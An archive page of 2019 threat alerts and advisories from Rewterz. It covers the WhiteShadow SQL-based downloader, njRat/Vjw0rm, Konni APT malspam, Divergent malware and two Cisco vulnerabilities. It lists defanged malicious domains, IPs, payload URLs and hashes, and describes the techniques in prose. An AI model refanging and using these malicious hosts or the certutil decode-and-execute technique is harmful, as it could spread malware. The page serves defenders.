Archive for September, 2019

Rewterz Threat Alert – New WhiteShadow Downloader Retrieves Malware Using Microsoft SQL

Severity

High

Analysis Summary

The use of Microsoft SQL queries to retrieve next-stage payloads has been relatively rare as a form of malware distribution. Using this tactic, new Microsoft Office macros are found acting as a staged downloader called “WhiteShadow.” WhiteShadow has been resurfacing in multiple campaigns with evolving evasion techniques.

Below is an example of one such campaign:

whiteshadpicture1.png

When recipients open malicious attached documents and activate macros, WhiteShadow operates by executing SQL queries against attacker-controlled Microsoft SQL Server databases.
Once retrieved, the macro decodes the string and writes it to disk as a PKZip archive of a Windows executable. Once extracted by the macro, the executable is run on the system to start installing malware, which is determined by the actor based on the script configuration stored in the malicious Microsoft Office attachments.
Series of malicious email campaigns distributing Microsoft Word and Microsoft Excel attachments containing the WhiteShadow downloader Visual Basic macro have been retrieved. Below is a visual infection chain of WhiteShadow.

image-1569842223.png

Impact

  • Agent Tesla
  • AZORult
  • Crimson
  • Nanocore
  • njRat
  • Orion Logger
  • Remcos
  • Formbook

Indicators of Compromise

IP(s) / Hostname(s)

  • mundial2018[.]duckdns[.]org
  • www[.]5214zz[.]com
  • antinio[.]mssql[.]somee[.]com
  • robinmmadi[.]servehumour[.]com
  • halwachi50[.]mymediapc[.]net
  • bytesdata[.]mssql[.]somee[.]com
  • naddyto[.]warzonedns[.]com
  • www[.]wortexpharma[.]com
  • www[.]scaker[.]com
  • tslserv[.]duckdns[.]org
  • www[.]bilbord[.]site
  • fabancho[.]mssql[.]somee[.]com
  • jasoncarlosscot[.]dynu[.]net
  • 87[.]247[.]155[.]111
  • 193[.]111[.]155[.]137
  • 45[.]138[.]172[.]161
  • 185[.]157[.]79[.]115
  • 185[.]161[.]210[.]111
  • 185[.]161[.]209[.]183
  • 139[.]28[.]36[.]212
  • 79[.]134[.]225[.]77
  • 46[.]246[.]85[.]129
  • 51[.]254[.]228[.]144
  • 45[.]92[.]156[.]76
  • 193[.]228[.]53[.]0
  • 192[.]3[.]157[.]104

URLs

  • http[:]//rebrand[.]ly/purchaseorder54326
  • http[:]//rebrand[.]ly/813ed538169eeeethczfz2346577777777788kfvmdkf

Malware Hash (MD5/SHA1/SH256)

  • 4b554367f8069f64201418cddcec82d7857dcc2573be7f0fb387c1b4802040b6
  • 5d7339e420e98c5730ac966e3f8099e3
  • 2ea787dfd65b0488b76b0a0a69ff2a632bb3bea3735ad007336b8dd1473f5768
  • c8892f7a5fdc48dddcec0e0da0d77842
  • a2b5168fb4b6a18d66571c6debc54f9f462f5b05a82313123feecc96dab0e595
  • 198161f222448d6c010d650f0f3725e3
  • c5193ba871414448c78cb516dfea622f2dbafa6bacb64e9d42c1769ebd4ffea3
  • 07faf2fc0e36a353f2b0a31dee587a18
  • fe88d40c56274a38ecd3a7178ac96970dd473c7ef3d0f54b5c8819f0b1fa41c3
  • dda4bb0c2c5bb7c1da6cd1845f6e50c0
  • a6a6b8c7cb72dd2670b6171576bc20c2f28198df12907b4d3ce010dcd97358e4
  • dcb035e6ea6d7af2adc72efd9b5e0593
  • bde269bf69582312c1ec76090991e7369e11dbee47a153af53e49528c8bd1b27
  • f7f0eda9b0db2c8427c1a2edb26bdb67
  • 0943a968cc9e00f83c0bb44685c67890c59ad7785db7fc12e9a0de8df309cbfa
  • 4b585be700825e0e4fbfa2d23f4e1306
  • b2c0b1535518321fbcde2c9d80f222e9477053e6ee505f2dd3b680277f80de1d
  • 8540a565ca9535779dcfba0f1e35a0d8
  • bd7abfaa0d3b1d315c2565c83c1003c229c700176c894752df11e6ecae7ad7e6
  • 5a13432e4f3e8afa4773662c3df457fd
  • 0e54bf9380d40d34e6a3029b6e2357f4af1738968646fdaa0c369a6700e158f4
  • 40345b441e5f547a364483f9cbaee208
  • 64c5d3f729d9a1ec26d5686002ccb0111ee9ba6a6a8e7da6ad31251f5d5dde6a
  • 61971b56add584c6ffdffc36dda8d00f
  • fcc8802b49bfb86d0cffb1cbc4f1b283887015b7da2263f9165a28f1b0f63f47
  • d397f71c280ad5b9a3342d36ff619a9f
  • 17742a3ca746f7f13aff1342068b2b78df413f0c9cd6cdd02d6df7699874a13a
  • 300f8518f18fe6c55f1f674e236e54f2
  • 4c487ba8dfded5d050d01ab656ef3916c5269551e51ed60f9cfa5995f55e3264
  • 2a6c94033d9f6ace23a4b0a24299375e
  • 35e81258c4365fb97ae57f3989164ed4e8b8e62668af9d281a57c5e7a70c288c
  • 00d02ec4503c664f6acf1bcbfb4c6971
  • ee0f3eb8a4d7c87a4c33a1f8b08e78bb95fa7ee41ddf0b07d9b6eabe87a33b2e
  • 69acb200963a9ba1fbcc700143d08756
  • ed8f4a7f09e428ceff8ede26102bb153b477b20775a0183be4ca2185999d20c8
  • b266aafb2b1036232b93373a44a256b5
  • acf9c1dda4a2076f0d503450db348ae2913345ebd134a3701baa2ff5ebaccd6e
  • e01bc1c85c19527494a73ab45d32684f
  • 95dbabe512ba4fc45e32786e87c292fb665e18bc0e2fea1cadb43ba1fe93f13b
  • b25ceb983ad0fa37e41cf1d4b0b6486a

Remediation

  • Block the threat indicators at their respective controls.
  • Do not download files (word & excel) attached in emails coming from untrusted sources.
  • Always scan files before executing.
  • Do not enable macros for files downloaded from untrusted sources.

Rewterz Threat Alert – Ongoing Njrat campaign against Middle East

Severity

Medium

Analysis Summary

An infection campaign that is using different kinds of threats. One of these threats is Vengeance Justice Worm, also known as Vjw0rm, which is developed in Javascript. This is a type of malware capable of acting as a RAT or spreading through removable devices, thus doing worm functions, among others.

Its second main threat is Hallaj Pro RAT, a modified version of the well-known NJRat Trojan, which consists of a remote control tool known since 2013, and developed in .NET, and which has been seen on multiple occasions related to campaigns carried out against the Middle East.

Impact

Exposure of sensitive information

Indicators of Compromise

Malware Hash (MD5/SHA1/SH256)

  • 1ad569e51149b42ad120ea602af449f8500c133c8c42914af8ecc0794dc83834
  • 476676f16cead94a1785c9fe0673c2698852e0bdfc2f8c75304602077e93b009
  • 4881d5b56d3157c2ceaa7783b77b26040379028c24a2e7209ecac93d6ef00801
  • 84e320b90e26db1102039c3f4310c0e59feed04b237c1a2a2561da4c27af2875
  • 880c26d7e48a0f2a61efcdba8dd47877b04f45475749a82b6fe82f90b6f2ad0f
  • a94b72bb15722c3d43789626f5f04d2e8a8637e2e7a659c57c6a13f6f9388adf
  • cbd3fc58b5c9c6a3933de8ecfb265b498d821357e564448185249e398ff8c128
  • ec8fad7f46a2cf0357698200f5a25abba84cdc0fda60ea4663aef8beeb147de6
  • f6c750b914d2a600955645fe6c6da9337f7e7744e74cf155faf23bfba640d7b7
  • 0c207afbce75fcf3e72ec67ba228a7ec62180720f8073b90e7e0dfea5157a27a
  • 51596728c9cb9144d157c5fc0e20d2bc8bbb3f60f98a56967b74e4a987be88a6
  • 60e3b5d728deee521b024db1af7a0964f1b758e9036d1cb16f73c969713c02e5
  • 6f748f450d2d4e7ef5b1e35e1bfeb7f0e28cc694ba6f32f92f2ebb69384edac6
  • 98d9182dcb8036d52ac1c1316cba153ae447333f84b51778b3e40a34bbda3583
  • 1b7e79186b8c29e83e04297c3f792dcf8fc2079d8ed6c96e80757085ddd63aa8
  • 9862c0ffa2d392c654986bd2b9a3f8a8fcc7208ec913f11971d2b8b2069d98cb
  • ba3d06afc59f391c76c8a115376e370f819200e9f54a07f64e2b4e5c7b24f442
  • c895f922b79616b3724006ca3e54c1369a5f0f6847293e729381b93621747a61

Remediation

  • Block all threat indicators at your respective controls.
  • Always be suspicious about emails sent by unknown senders.
  • Never click on the link/attachments sent by unknown senders.

Rewterz Threat Alert – Konni’s APT Group Runs Malspam Campaigns

Severity

Medium

Analysis Summary

Konni’s APT Group continues to attack malicious documents written in Russian. Konni’s APT Group conducts attacks with Russian-North Korean trade and economic investment documents.

The vector used for the attack is probably the Spear Phishing method, and has been reported in Korea.

The malicious file suspected of being used as an attachment has the name Russia-North Korea-South Korea-Trade and Economic Relations-Investment.doc

99CA504B5D8AF93701

The malicious DOC document file contains the following VBA code. If the [Use Content] button is clicked, the VBA malware included inside is activated. And the contents of the document are printed as follows, which makes the user dazzle like a normal document file. VBA code makes connections with malicious C2 servers contained in the ObjectPool zone. The attacker would communicate with the attacker’s server through a combination of instructions contained in the ObjectPool TextBox1 to TextBox3 data and content. The content of object ‘_1629205277’ is hardcoded to communicate with the C2 server ‘panda2019.eu5 [.] Org’ address as follows: And copy ‘certutil.exe’ normal file to ‘mx.exe’ file name, and use it to decode and execute ‘1.txt’ file.

Impact

Exposure of sensitive information

Indicators of Compromise

URLs

http[:]//handicap[.]eu5[.]org/1[.]txt
http[:]//handicap[.]eu5[.]org/4[.]txt
http[:]//handicap[.]eu5[.]org/3[.]txt
http[:]//clean[.]1apps[.]com/1[.]txt
http[:]//clean[.]1apps[.]com/3[.]txt
http[:]//panda2019[.]eu5[.]org/1[.]txt’
http[:]//panda2019[.]eu5[.]org/1[.]txt

Filename

Russia-North Korea-South Korea-Trade and Economic Relations-Investment.doc

Malware Hash (MD5/SHA1/SH256)

  • ed63e84985e1af9c4764e6b6ca513ec1c16840fb2534b86f95e31801468be67a
  • 4c201f9949804e90f94fe91882cb8aad3e7daf496a7f4e792b9c7fed95ab0726
  • 8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd
  • 0c81b761f75047ccc4f41371fd8106d4

Remediation

  • Block all threat indicators at your respective controls.
  • Always be suspicious about emails sent by unknown senders.
  • Never click on the link/attachments sent by unknown senders.

Rewterz Threat Alert – Divergent: Fileless Malware Using NodeJS

Severity

Medium

Analysis Summary

A new malware loader being used to deliver and infect systems with a previously undocumented malware payload called Divergent. This threat uses NodeJS — a program that executes JavaScript outside of a web browser — as well as the legitimate open-source utility WinDivert to facilitate some of the functionality in the Divergent malware. The use of NodeJS is not something commonly seen across malware families.

The observed malware campaigns associated with Divergent feature the use of persistence techniques most commonly associated with “fileless” malware. This malware can be leveraged by an attacker to target corporate networks and appears to be primarily designed to conduct click-fraud. It also features several characteristics that have been observed in other click-fraud malware, such as Kovter.

Impact

Exposure of sensitive information

Indicators of Compromise

URLs

  • hxxps[:]//1292172017[.]rsc[.]cdn77[.]org/images/trpl[.]png
  • hxxps[:]//1292172017[.]rsc[.]cdn77[.]org/imtrack/strkp[.]png

Malware Hash (MD5/SHA1/SH256)

  • ba04eacaa80bb5da6b02e1e7fdf3775cf5a44a6179b2c142605e089d78a2f5b6
  • a82dd93585094aeba4363c5aeedd1a85ef72c60a03738b25d452a5d895313875
  • 2f4a9ef2071ee896674e3da1a870d4efab4bb16e2e26ea3d7543d98b614ceab9
  • 77498f0ef4087175aa85ce1388f9d02d14aaf280e52ce7c70f50d3b8405fea9f
  • b2d29bb9350a0df93d0918c0208af081f917129ee46544508f2e1cf30aa4f4ce
  • bf2cdd1dc2e20c42d2451c83b8280490879b3515aa6c15ab297419990e017142
  • ba04eacaa80bb5da6b02e1e7fdf3775cf5a44a6179b2c142605e089d78a2f5b6
  • a7656ccba0946d25a4efd96f4f4576494d5f1e23e6ad2acc16d2e684656a2d4f
  • 607b2f3fd1e73788a4d6f5a366c708dbb12d174eba9863ade0af89ca40e1fdba

Remediation

  • Block all threat indicators at your respective controls.
  • Always be suspicious about emails sent by unknown senders.
  • Never click on the link/attachments sent by unknown senders.

Rewterz Threat Advisory – CVE-2019-1955 – Cisco Email Security Appliance Header Injection Vulnerability

Severity

Medium

Analysis Summary

The vulnerability is due to incomplete input and validation checking mechanisms for certain SPF messages that are sent to an affected device. An attacker could exploit this vulnerability by sending a customized SPF packet to an affected device. A successful exploit could allow the attacker to bypass the header filters that are configured for the affected device, which could allow malicious content to pass through the device.

Impact

Security bypass

Affected Vendors

Cisco

Affected Products

Cisco AsyncOS Software prior than 4.0MR1

Remediation

Please see vendor’s advisory for more details.

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190807-esm-inject


Rewterz Threat Advisory – CVE-2019-1901 – Cisco Nexus 9000 Series Buffer Overflow Vulnerability

Severity

High

Analysis Summary

The vulnerability is due to improper input validation of certain type, length, value (TLV) fields of the LLDP frame header. An attacker could exploit this vulnerability by sending a crafted LLDP packet to the targeted device. A successful exploit may lead to a buffer overflow condition that could either cause a DoS condition or allow the attacker to execute arbitrary code with root privileges.

Impact

  • DoS
  • Privilege access

Affected Vendors

Cisco

Remediation

Please see vendor’s advisory for the list of affected products and more details

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190731-nxos-bo


Copyright © Rewterz. All rights reserved.